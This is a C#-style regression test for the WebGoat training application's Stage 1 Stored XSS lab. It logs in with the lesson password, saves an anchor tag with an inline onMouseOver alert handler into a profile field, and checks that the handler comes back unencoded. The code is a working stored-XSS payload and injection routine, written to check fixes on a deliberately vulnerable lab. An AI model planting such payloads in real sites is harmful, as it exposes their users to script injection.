/// <summary>
/// Regression check for the WebGoat "LAB: Cross Site Scripting" lesson, Stage 1 (Stored XSS).
/// Logs in with the lesson password, opens the profile editor, writes an HTML marker
/// containing an inline event handler into one profile field, saves the profile, and
/// asserts that the handler attribute is present in the resulting page markup.
/// </summary>
/// <param name="fieldToInsertPayload">Name of the profile form field that receives the marker.</param>
/// <returns>The literal string "ok" when the assertion holds.</returns>
/// <remarks>
/// A passing assertion means the field value was rendered without HTML output encoding.
/// A lesson build that encodes the value on output should make this assertion fail,
/// which is the signal to look for when verifying a fix.
/// The check only inspects the page returned after "UpdateProfile"; it does not confirm
/// that the handler executes or that the value is shown to a different user.
/// </remarks>
private string Exploit_Stage_1_Stored_XSS(string fieldToInsertPayload)
{
    setup();

    // Harmless marker: an anchor whose handler only raises an alert box.
    var storedMarkup = "<a href=\"\" onMouseOver=\"javascript:alert('xss')\">Over me to see xss</a>";

    // Navigate to the lesson.
    webGoat.openMainPage();
    //ie.disableFlashing();
    ie.link("Cross-Site Scripting (XSS)").flash().click();
    ie.link("LAB: Cross Site Scripting").flash().click();
    // The stage link is only highlighted here, not clicked (kept as in the original flow).
    ie.link("Stage 1: Stored XSS").flash();

    // Log in with the lesson password.
    ie.field("password").flash().value("larry");
    ie.button("Login").flash().click();

    // Pick the first option of the second select list on the page, then open it for editing.
    var staffList = ie.selectLists()[1];
    staffList.options()[0].select().flash();
    ie.button("ViewProfile").flash().click();
    ie.button("EditProfile").flash().click();

    // Store the marker in the requested field and save the profile.
    ie.field(fieldToInsertPayload).value(storedMarkup).flash();
    ie.button("UpdateProfile").flash().click();

    // NOTE(review): the marker is written as "onMouseOver" but the check looks for the
    // lower-case "onmouseover"; this presumably relies on the browser lower-casing
    // attribute names when it serializes the page, so confirm against ie.html() output.
    var markerRendered = ie.html().contains("onmouseover=\"javascript:alert('xss')\"");
    Assert.That(markerRendered, "Payload was not inserted into page");

    return "ok";
}